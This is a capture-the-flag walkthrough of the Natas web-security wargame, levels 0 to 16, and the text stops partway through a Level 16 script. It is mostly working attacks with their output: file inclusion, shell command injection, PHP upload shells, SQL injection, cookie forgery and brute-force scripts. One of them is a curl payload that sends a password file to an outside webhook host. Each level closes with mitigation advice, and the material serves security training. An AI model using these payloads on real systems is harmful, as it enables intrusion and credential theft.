Natas

The Natas wargame covers basic concepts in server-side web security.

code

The code snippets provided here are not copy/pastable into a terminal, but instead prioritize readability. $PW is a placeholder for the password for the current level.

Runnable code for this walkthrough is available at haggqvist/otw.

Level 0

The 0th level includes the password for natas1 in the HTML document body:

$ curl -s http://natas0.natas.labs.overthewire.org \
> -u natas0:natas0 | grep natas1
<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->

Level 1

This level has blocked right-clicking by using the oncontextmenu attribute, but this is easily bypassed by using a command line tool:

$ curl -s http://natas1.natas.labs.overthewire.org \
> -u natas1:$PW | grep natas2
<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->

Conclusion

Memes and easter eggs are encouraged in the source. Secrets? Not so much.

Level 2

For this level, the password is not readily available in the source:

$ curl -s http://natas2.natas.labs.overthewire.org \
> -u natas2:$PW | sed -n "/<body/,/body>/p"

<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

sed pattern

the sed command used here allows extracting the contents between the HTML body tag using a search pattern.

The files/pixel.png file is an image file of is 1x1 pixels. It might contain some other data:

$ curl -s http://natas2.natas.labs.overthewire.org/files/pixel.png \
> -u natas2:$PW | strings
IHDR
gAMA
sRGB
 cHRM
PLTE
tRNS
bKGD
        pHYs
IDAT
%tEXtdate:create
2012-09-17T15:24:23+02:00
%tEXtdate:modify
2008-01-02T23:13:08+01:00
IEND

Nope, it doesn't look like it. Perhaps the /files directory is accessible? lynx is your friend if you like the idea of browsing the web from the terminal:

$ lynx -auth natas2:$PW http://natas2.natas.labs.overthewire.org/files/

A directory listing is returned, including a users.txt file:

                                 Index of /files

   [ICO] Name Last modified Size Description
     ___________________________________________________________________

   [PARENTDIR] Parent Directory   -
   [TXT] users.txt 2016-12-20 05:15 145
   [IMG] pixel.png 2016-12-15 16:07 303
     ___________________________________________________________________


    Apache/2.4.10 (Debian) Server at natas2.natas.labs.overthewire.org
    Port 80

... and the users.txt file contains the password for natas3:

# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH

Conclusion

The lesson here is obviously to ensure that directory permissions are configured correctly for the web server. The user running the web server process must only be able to access files that are part of the site.

Level 3

Level 3 presents the following body:

<body>
<h1>natas3</h1>
<div id="content">
There is nothing on this page
<!-- No more information leaks!! Not even Google will find it this time... -->
</div>
</body></html>

This time around the only information shared is a comment that gives away an obvious hint. Search engines use web crawlers to index websites. It is common to use a robots.txt file to provide instructions to such programs (and occasionally easter eggs) about which pages are allowed to be accessed.

A quick check confirms the file exists, with a Disallow rule configured for the /s3cr3t/ path:

$ curl -s http://natas3.natas.labs.overthewire.org/robots.txt \
> -u natas3:$PW
User-agent: *
Disallow: /s3cr3t/

... and a users.txt file containing the natas4 credentials is available in this location:

$ curl -s http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt \
> -u natas3:$PW
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Conclusion

The correct way to prevent web crawlers from accessing pages is to use some form of authentication - requesting pages to not be accessed does not help address this issue. Since this level requires authentication the appropriate mechanisms to avoid crawling and indexing are actually already implemented.

A robots.txt file does not prevent a webpage from being indexed and included in search engine results. To prevent a website from being indexed, there are other mechanisms such as the noindex meta tag.

Level 4

Let's check what Level 4 has in store:

<body>
<h1>natas4</h1>
<div id="content">

Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"
<br/>
<div id="viewsource"><a href="index.php">Refresh page</a></div>
</div>
</body>

The hint given indicates that requests are expected to originate from another location. When following a link, browsers will typically automatically set the Referer HTTP header, including information about the site the request is coming from. This has valid uses but can be very problematic for privacy. Based on the message presented it looks like the site is using the Referer header value for access decisions.

This theory can be confirmed by setting a sample header in a request:

$ curl -s http://natas4.natas.labs.overthewire.org \
> -u natas4:$PW -H "Referer: camp7.colony.mars" | grep visiting
Access disallowed. You are visiting from "camp7.colony.mars" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"

The theory appears to be correct - the input value is reflected in the response. Updating the Referer header with the expected value grants access:

$ curl -s http://natas4.natas.labs.overthewire.org \
> -u natas4:$PW -H "Referer: http://natas5.natas.labs.overthewire.org/" |
> grep natas5
Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Conclusion

The Referer HTTP header must never be used for access control or security. It can be set to any value by the agent making the request. Valid use cases for this header are ones related to analytics.

Level 5

Time for the fifth level of Natas. The following site contents are presented:

<body>
<h1>natas5</h1>
<div id="content">
Access disallowed. You are not logged in</div>
</body>

The only details shared is that we are currently not logged in. Using cookies is probably the most ubiquitous way of managing sessions with websites. We can use curl's -c flag with the - argument to print cookies to stdout:

$ curl -s -c - http://natas5.natas.labs.overthewire.org \
> -u natas5:$PW | tail -n 3
# This file was generated by libcurl! Edit at your own risk.

natas5.natas.labs.overthewire.org       FALSE   /       FALSE   0       loggedin        0

Right, so the site writes a cookie loggedin and sets the value to 0. It doesn't take too much cognitive effort to deduce toggling this to 1 (or likely any other positive value) may be a good next step. The -b flag can be used to set cookies using curl:

$ curl -s -b "loggedin=1" http://natas5.natas.labs.overthewire.org \
> -u natas5:$PW | grep natas6
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</div>

Conclusion

The lesson is that cookies are controlled by the client. While the server can provide cookie values through the Set-Cookie HTTP header, clients can manipulate their values (or delete them) at any time. Using cookies to manage sessions and states is not bad per se, but values need to be randomly generated using a sufficient amount of entropy and tied to a specific user and session. They should also expire within a reasonable time frame.

Level 6

Level 6 presents a form into which the user is asked to submit a secret:

<body>
<h1>natas6</h1>
<div id="content">


<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

Rather helpfully, there's a link to the source of this implementation which presents additional detail. A php function is defined:

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
            print "Access granted. The password for natas7 is <censored>";
        } else {
            print "Wrong secret";
        }
    }
?>

This is just as basic as it looks. When submitting the form on the page it makes a POST request to this function, comparing the value provided with a variable $secret defined in the secret.inc file. Turns out this file is accessible:

$ curl -s http://natas6.natas.labs.overthewire.org/includes/secret.inc \
> -u natas6:$PW
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

Making a POST request to submit the form returns the password:

$ curl -s -X POST http://natas6.natas.labs.overthewire.org \
> -u natas6:$PW -F "secret=FOEIUWGHFEEUHOFUOIU" -F "submit=submit" |
> grep natas7
Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Conclusion

There's really not much new to mention on this level: directory permissions are still the main problem. Not having access to the source code used by the form would've also made this more difficult.

Level 7

Level 7 presents a simple page with two links:

<body>
<h1>natas7</h1>
<div id="content">

<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
</div>
</body>

As highlighted in the hint and mentioned in the introduction, the password for the next level is available in /etc/natas_webpass/natas8. Following either link simply renders the contents of the target file on the main site:

$ curl -s http://natas7.natas.labs.overthewire.org/home \
> -u natas7:$PW
this is the front page
$ curl -s http://natas7.natas.labs.overthewire.org/about \
> -u natas7:$PW
this is the about page

In summary, the page reads contents of files on the server's file system and displays this information when the links are followed. This can present a File Inclusion vulnerability, where the server can be requested to serve up the contents of arbitrary files, either remotely or locally. In this case, a Local File Inclusion attack is possible:

$ curl -s http://natas7.natas.labs.overthewire.org/index.php?page=/proc/version \
> -u natas7:$PW | grep Linux
Linux version 4.7.9-grsec (root@template) (gcc version 4.9.2 (Debian 4.9.2-10) ) #4 SMP Wed Nov 30 15:55:44 EST 2016
$ curl -s http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8 \
> -u natas7:$PW | grep -v "<"

DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Conclusion

This vulnerability is a result of how the PHP include expression is implemented. Similar issues exist for require. Use of include can be confirmed by passing in a file path that doesn't exist or the application can't access:

$ curl -s http://@natas7.natas.labs.overthewire.org/index.php?page=/such/gone/much/missing \
> -u natas7:$PW | grep "Warning"
<b>Warning</b>:  include(/such/gone/much/missing): failed to open stream: No such file or directory in <b>/var/www/natas/natas7/index.php</b> on line <b>21</b><br />
<b>Warning</b>:  include(): Failed opening '/such/gone/much/missing' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/natas/natas7/index.php</b> on line <b>21</b><br /

An E_WARNING generated from not being able to access the file is returned, exposing the include_path used which may help an attacker identify where other source files may be located.

This type of attack can be prevented in a number of ways. For example by maintaining a list of accepted input files or only searching for files within a given folder structure or of a particular type before handing over to include. In the latter cases, filtering would have to be used to remove escape patterns such as ../../ which could be used for directory traversal.

A basic way to restrict access to specific filenames may look like this:

<?php
include($_GET['page'] . '.php');
?>

In versions of PHP prior to 5.3, a NULL character attack could be used to bypass this like so:

/index.php?page=/home/noob/.ssh/id_ed25519%00 # yoink!

Of course, restricting the process permissions such that it can't read any files it should not be able to is also not a bad idea. Care must be taken to not expose any local errors in messages to the user since this will almost certainly lead to unwanted data leakage.

Finally, it should be noted that this attack may also be used to load remote files using HTTP. In this case however, this functionality has been disabled by configuring allow_url_include:

$ curl -s http://natas7.natas.labs.overthewire.org/index.php?page=http://ifconfig.me \
> -u natas7:$PW | grep allow_url_include
<b>Warning</b>:  include(): http:// wrapper is disabled in the server configuration by allow_url_include=0 in <b>/var/www/natas/natas7/index.php</b> on line <b>21</b><br />

Level 8

This level presents another submit form which accepts some secret value:

<body>
<h1>natas8</h1>
<div id="content">


<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

Like a previous level, a link to the source code is included, which presents the following implementation:

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
        print "Access granted. The password for natas9 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>

Everything needed is presented. The encodeSecret function just need to be reversed using the $encodedSecret value as input. Reversing the function includes:

Convert hex string to bytes
Reverse the output
Base64 decode

Here's one way of doing this using python:

>>> import base64
>>> secret = bytes.fromhex("3d3d516343746d4d6d6c315669563362")
>>> secret = secret[::-1] # reverse
>>> base64.b64decode(secret).decode()
'oubWYf2kBq'

The resulting secret can be submitted into the form:

$ curl -s -X POST http://natas8.natas.labs.overthewire.org \
> -u natas8:$PW -F "secret=oubWYf2kBq" -F "submit=submit" |
> grep natas9
Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Conclusion

The lesson to take away here is that data encoding != encryption. Schemes that use reversible encoding, such as HTTP Basic authentication are not secure.

Of course, without access to the source code it will not be as straightforward to reverse engineer the implementation. Basing the security of a system on the source code not being accessible is a bad idea.

Level 9

Another level, another submit form:

<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

In line with previous levels a link to the source code is included:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>

User input passed in the needle parameter is used to grep contents from a dictionary.txt file, for example:

$ curl -s -X POST http://natas9.natas.labs.overthewire.org \
> -u natas9:$PW -F "needle=derp" -F "submit=submit" |
> sed -n "/<pre>/,/<\/pre>/p"

<pre>
underpants
underpass
underpass's
underpasses
underprivileged
</pre>

The issue here is that $key is passed directly to grep without filtering. As a quick reminder, the syntax for grep is as follows:

$ grep --help| head -3
Usage: grep [OPTION]... PATTERNS [FILE]...
Search for PATTERNS in each FILE.
Example: grep -i 'hello world' menu.h main.c

Because grep allows searching in one or more files the input can be modified to search an arbitrary file. So one way of solving this challenge would be to make the program search multiple files, for example resulting in the following command:

grep -i . /etc/natas_webpass/natas10 dictionary.txt

By adding a #, it is even possible to exclude the dictionary.txt file:

$ curl -s -X POST http://natas9.natas.labs.overthewire.org \
> -u natas9:$PW -F "needle=. /etc/natas_webpass/natas10 #" -F "submit=submit" |
> sed -n "/<pre>/,/<\/pre>/p"

<pre>
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
</pre>

Conclusion

for i in {1..100}; do echo "Never trust user input!"; done

Simple ways of addressing this include:

Wrap the input string in quotes
Splitting the input string based on spaces and only pass the first value

In both cases, a single value would be used for the pattern and additional files would not be searched.

Level 10

Level 10 is basically a repeat of Level 9, except some filtering is now applied:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

This highlights the fact that Level 9 could have been solved in a different way, by using command injection:

$ curl http://natas9.natas.labs.overthewire.org \
> -u natas9:$PW \
> -G --data-urlencode "needle=; cat /etc/natas_webpass/natas10 #" \
> -d "submit=search" | sed -n "/<pre>/,/<\/pre>/p"
<pre>
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
</pre>

... but the approach demonstrated for Level 9 still works:

$ curl -s -X POST http://natas10.natas.labs.overthewire.org \
> -u natas10:$PW \
> -F "needle=-H . /etc/natas_webpass/natas11 #" -F "submit=submit" |
> grep natas11:
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Conclusion

While this may be a step in the right direction of validating user input, it is simply not enough.

Level 11

Level 11 introduces some new concepts:

<body style="background: #ffffff;">
Cookies are protected with XOR encryption<br/><br/>


<form>
Background color: <input name=bgcolor value="#ffffff">
<input type=submit value="Set color">
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

The website states that cookies are protected by XOR "encryption" and there's a form to set the background color. Presumably cookies in the response are used to store session data, including the color.

The following source code is provided (edited slightly for readability):

<?
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
        $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
        $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
        if(is_array($tempdata)
        && array_key_exists("showpassword", $tempdata)
        && array_key_exists("bgcolor", $tempdata)) {
            if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
                $mydata['showpassword'] = $tempdata['showpassword'];
                $mydata['bgcolor'] = $tempdata['bgcolor'];
            }
        }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);

if($data["showpassword"] == "yes") {
    print "The password for natas12 is <censored><br>";
}
?>

Here's a breakdown:

An array is declared with default values for showpassword and bgcolor
An encryption function that accepts text input and XORs each character against a key is defined
Functions to load, and save data are defined. The data encoded and encrypted before being saved and the reverse when loaded. The data is stored in a data cookie
The user can modify bgcolor through the submit form. Regex is used to ensure a valid RGB hex pattern
If $data['showpassword'] is set to "yes", the password for natas12 is displayed

A reasonable way to attack this level may be to manually create a cookie with a value, such that when decoded and decrypted, showpassword is set to "yes". The encryption needs to be reversed to enable this.

The interesting thing about XOR encryption applied this way is that it is 100% reversible. Any given output will convert back to its input. This also means that keys can be leaked with a known plaintext attack. For example:

>>> from itertools import cycle
>>> def xor(text: str, key: str="secret") -> str:
...     xor_list = zip(text, cycle(key)) if len(text) > len(key) else zip(cycle(text), key)
...     return "".join(chr(ord(a) ^ ord(b)) for a, b in xor_list)
...
>>> xor("hello")
'\x1b\x00\x0f\x1e\n\x1c'
>>> xor(xor("123456"), key="123456")
'secret'
>>> xor(xor("fish go moo!"), key="fish go moo!")
'secretsecret'

This approach can be used to compute the key using the default JSON-encoded $data array and the default cookie value. The default cookie, which reflects showpassword: no and bgcolor: #ffffff can be obtained as follows:

$ curl -s -c - http://natas11.natas.labs.overthewire.org \
> -u natas11:$PW | tail -n1 | cut -f7
ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D

It should be noted that the cookie is URL encoded. Continuing from the python REPL above, the key can be computed:

>>> import json, base64
>>> cookie = base64.b64decode("ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=").decode()
>>> key = { "showpassword": "no", "bgcolor": "#ffffff" }
>>> key = json.dumps(key, separators=(",", ":")) # compact JSON
>>> xor(cookie, key=key)
'qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq'

The key appears to be "qw8J". This can be used to compute a new cookie:

>>> key = "qw8J"
>>> data = { "showpassword": "yes", "bgcolor": "#ffffff" }
>>> data = json.dumps(data, separators=(",", ":"))
>>> cookie = xor(data, key=key)
>>> base64.b64encode(cookie.encode()).decode()
'ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK'

... which can be used to get the password for natas12:

$ curl -s http://natas11.natas.labs.overthewire.org \
> -u natas11:$PW \
> -b "data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK" |
> grep natas12
The password for natas12 is EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3<br>

Conclusion

There are two main lessons to take away from this level. The first is that this XOR implementation is completely insecure and leaks the key used. The second lesson is that it is not a good idea to mix user settings with sensitive data. There's no reason why the user preferences that do not contain any sensitive data could not be stored in separate cookies, removing the need for encryption.

Cookies used for authentication should, where possible, be entirely random values. The random value can be mapped to some state in the backend.

Level 12

Level 12 includes a multipart form to upload files:

<body>
<h1>natas12</h1>
<div id="content">

<form enctype="multipart/form-data" action="index.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="1000" />
<input type="hidden" name="filename" value="rp02dxd4ko.jpg" />
Choose a JPEG to upload (max 1KB):<br/>
<input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

The source code is provided, but is not necessarily needed to beat this level. The file name is set in the filename and the extension can be manipulated. It should be possible to override this and upload a php file that reads out the password for natas13:

natas12.php

<?
include('/etc/natas_webpass/natas13');
?>

Upload the file:

$ curl -s http://natas12.natas.labs.overthewire.org \
> -u natas12:$PW \
> -F "uploadedfile=@natas12.php" -F "filename=natas12.php" | grep upload
The file <a href="upload/84deai98yl.php">upload/84deai98yl.php</a> has been uploaded<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

... and visit the site:

$ curl -s http://natas12.natas.labs.overthewire.org/upload/84deai98yl.php \
> -u natas12:$PW 
jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Conclusion

Yet another case of not sanitizing user input. In addition to enforcing the type of file name server side, it would also be appropriate to inspect the file's contents (e.g. header) to determine its actual MIME type.

Level 13

Continuation from Level 12, but this time around additional restrictions are applied to the files uploaded:

<?
/* snip */
if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);

    $err=$_FILES['uploadedfile']['error'];
    if($err){
        if($err === 2){
            echo "The uploaded file exceeds MAX_FILE_SIZE";
        } else{
            echo "Something went wrong :/";
        }
    } else if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
        echo "File is not an image";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path))
/* snip */
?>

The exif_imagetype function reads the first few bytes of an image to check its signature. It might be possible to get around this by creating a file that starts with a valid jpeg header, followed by php code to read a file as used in Level 12.

First, the php file is prepared:

natas13.php

<?
include('/etc/natas_webpass/natas14');
?>

Next, a JPEG header is written to a file, followed by the contents above:

$ echo -n -e '\xFF\xD8\xFF' > natas13.pwn
$ cat natas13.php >> natas13.pwn
$ stat -c %s natas13.pwn
47

Repeat the approach used in Level 12:

$ curl -s http://@natas13.natas.labs.overthewire.org \
> -u natas13:$PW \
> -F "uploadedfile=@natas13.pwn" -F "filename=natas13.php" | grep upload
The file <a href="upload/8l8zc047qi.php">upload/8l8zc047qi.php</a> has been uploaded<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
$ curl -s http://natas13.natas.labs.overthewire.org/upload/8l8zc047qi.php \
> -u natas13:$PW
Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Conclusion

This is a slight improvement over the previous Level, in the sense that some validation is now happening. It is however insufficient to rely on hints from file headers to determine all the contents of a file. While more thorough parsing of files to determine their type could be useful, the right way to prevent this sort of attack is to ensure the files uploaded are never interpreted as executable code.

Level 14

Level 14 presents a login form:

<body>
<h1>natas14</h1>
<div id="content">

<form action="index.php" method="POST">
Username: <input name="username"><br>
Password: <input name="password"><br>
<input type="submit" value="Login" />
</form>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

The following source code is provided:

<?
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysql_close($link);
} else {
?>

Outside of storing an actual password there are two main problems here:

Input for the SQL query is not properly sanitized
Access logic is limited to checking that more than 0 rows are returned

The debug flag is also interesting, as it enables printing the resulting SQL query. In php, the $_GET variable is not only populated by HTTP GET requests but rather any request with a query string. For example:

$ curl -s -X POST http://natas14.natas.labs.overthewire.org?debug=yes \
> -u natas14:$PW \
> -F "submit=Login" -F "username=natas15" -F "password=???" | grep Executing
Executing query: SELECT * from users where username="natas15" and password="???"<br>Access denied!<br><div id="viewsource"><a href="index-source.html">View sourcecode</a></div

It should be sufficient to make this query return more than one row. This can be achieved using a query as follows, since the user natas15 is likely to exist:

SELECT * from users where username="natas15" and password="secret" or "42"

This can be achieved by setting the password parameter to secret" or "42, escaping the quotes as necessary:

$ curl -s -X POST http://natas14.natas.labs.overthewire.org?debug \
> -u natas14:$PW \
> -F "submit=Login" -F "username=natas15" -F "password=secret\" or \"42" |
> grep natas15
Executing query: SELECT * from users where username="natas15" and password="secret" or "42"<br>Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J<br><div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

Conclusion

This level introduces the concept of SQL injection attacks. A straightforward way to mitigate this attack would be to check that the query returned the expected result/s instead of just any result. It is also a good idea to validate the user input to ensure it matches the expected format and enforce encoding of escape characters before composing the query string. Specific guidance for php is available on the official site.

Additionally, the following remarks can be made:

It is usually a good idea to disable debugging interfaces in a production environment to avoid information leakage
It is never a good idea to store passwords in plaintext

Level 15

More SQL stuff:

<?

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas15', '<censored>');
    mysql_select_db('natas15', $link);

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
        if(mysql_num_rows($res) > 0) {
            echo "This user exists.<br>";
        } else {
            echo "This user doesn't exist.<br>";
        }
    } else {
        echo "Error in query.<br>";
    }

    mysql_close($link);
} else {
?>

This is similar to the previous Level, but this time there's no obvious way to make the level read out a password. From the comments one can learn the structure of the users table consisting of two columns username and password which have a maximum size of 64 characters.

Presumably, user natas16 exists:

$ curl -s -X POST http://natas15.natas.labs.overthewire.org?debug \
> -u natas15:$PW \
> -F "username=natas16" | grep exists
Executing query: SELECT * from users where username="natas16"<br>This user exists.<br><div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

Since the SQL query can be manipulated, it should be possible to test characters in the user's password with queries like the following:

SELECT * from users where username="natas16" and password like "%a";

The below query confirms the character 'a' exists in the password:

$ curl -s -X POST http://natas15.natas.labs.overthewire.org?debug \
> -u natas15:$PW \
> -F "username=natas16\" and password like \"%a%" | grep natas16
Executing query: SELECT * from users where username="natas16" and password like "%a%"<br>This user exists.<br><div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

It would be very tedious to test this manually. The following python program can help automate testing of valid characters, using the Content-Length to determine if a response was successful or not. For more advanced brute forcing attacks it is probably idea to implement some form of concurrency, but this should do:

natas15_probe.py

import requests
import string


def get_query_string_params(char: str) -> dict:
    query = f'natas16" and password like "%{char}%'
    return {"username": query}


def check_character(char: str, session: requests.Session, url: str) -> bool:
    params = get_query_string_params(char)
    with session.post(url, data=params) as response:
        return response.headers["Content-Length"] == "394"  # user exists


if __name__ == "__main__":

    url = "http://natas15.natas.labs.overthewire.org"
    # assume password is alphanumeric
    chars = string.ascii_lowercase + string.digits
    session = requests.Session()
    session.auth = ("natas15", "AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J")

    matches = ""

    for c in chars:
        if check_character(c, session, url):
            matches += c
        print(f"Matched: {matches}", end="\r")
    print(f"Matches: {matches}")

Running the program provides a list of valid characters:

$ python3 natas15.py 
Matches: abcehijmnopqrtw03569

It should be noted that this matching is case-insensitive due to how LIKE is implemented. It also does not account for repeated characters or position. This can be addressed using the LEFT and BINARY functions, producing a query like this:

SELECT * from users where username="natas16" and binary left(password, 3) = "abc";

Finally, an assumption is made that the password is 32 characters based on previous levels. Here's the updated code:

natas15.py

import requests


def get_query_string_params(char: str, index: int) -> dict:
    query = f'natas16" and binary left(password, {index}) = "{char}'
    return {"username": query}


def check_character(char: str, index: int, session: requests.Session, url: str) -> bool:
    params = get_query_string_params(char, index)
    with session.post(url, data=params) as response:
        return response.headers["Content-Length"] == "394"  # user exists


if __name__ == "__main__":

    url = "http://natas15.natas.labs.overthewire.org"
    chars = "abcehijmnopqrtw03569"
    chars += "".join(c for c in chars.upper() if c.isalpha())
    session = requests.Session()
    session.auth = ("natas15", "AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J")

    matches = ""

    while len(matches) < 32:  # assume password is 32 chars long
        for c in chars:
            if check_character(matches + c, len(matches) + 1, session, url):
                matches += c
            print(f"Matched: {matches}", end="\r")

    print(f"Password: {matches}")

Running the program produces the password after some time:

$ python3 natas15.py
Password: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

Conclusion

The same commentary about avoiding SQL injection apply here. Implementing rate limits, for example based on IP address or range can greatly reduce the practicality of a brute force attack.

Level 16

Throwback to Level10 with additional characters filtered out:

<?
// snip
if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
?>

The characters $() are all missing which means that command injection is possible. With input passed to grep as the filter the output of the command injected is not displayed. This is usually called a "blind" attack. One way to determine if a command is successfully injected without access to its output is to try commands that take different time to execute. sleep can be very useful:

$ /usr/bin/time -f %e \
> curl http://natas16.natas.labs.overthewire.org \
> -u natas16:$PW -s -o /dev/null \
> -G -d "needle=derp"
0.63
$ /usr/bin/time -f %e \
> curl http://natas16.natas.labs.overthewire.org \
> -u natas16:$PW -s -o /dev/null \
> -G --data-urlencode "needle=\$(sleep 5)"
5.31

It is obviously possible to execute commands. With this in mind, it should be possible to construct a grep command that looks like the following, appending the password to dictionary.txt and catching any word of length 15 or more:

$ grep -i "$(cat /etc/natas_webpass/natas17 >> dictionary.txt)..............." dictionary.txt

In testing this, I did not have much (read: any) success. It may be that the file is write protected and the standard error output is redirected elsewhere. Back to the drawing board.

The next idea I had was to read out the password and send it to another machine, for example using something like the following:

$ grep -i "$(curl http://webhook.site/7641a4a5-fe2c-4976-958b-4febed0aaa25?q=$(cat /etc/natas_webpass/natas17))" dictionary.txt

This should result in reading out the password and sending it to the target URL. Again, I was unable to get this working. It may be that the user is unable to access the curl command or that outbound connections are prevented. Using the which command as input, it is possible to determine that curl is present. In any case, either of the above would have been my preferred options of solving this challenge.

So what's left? Well, one option is to use a nested grep command to brute-force testing patterns against /etc/natas_webpass/natas17. If this command results in a match that information will be printed, otherwise no output is produced. Combining this with a known word from the dictionary enables using the output content to determine success/failure. The -E option for grep enables using regex in filters, such as ^ which indicates the start of a pattern which comes in handy when building out the password through brute force. For example:

$(grep -E ^. /etc/natas_webpass/natas17)Eskimo # match -> returns nothing
$(grep -E ^P /etc/natas_webpass/natas17)Eskimo # no match -> returns results for Eskimo

A simple python program can be constructed to help brute force the password this way:

natas16.py

import string
import requests


def get_query_params(pattern: str, sentinel: str) -> dict:
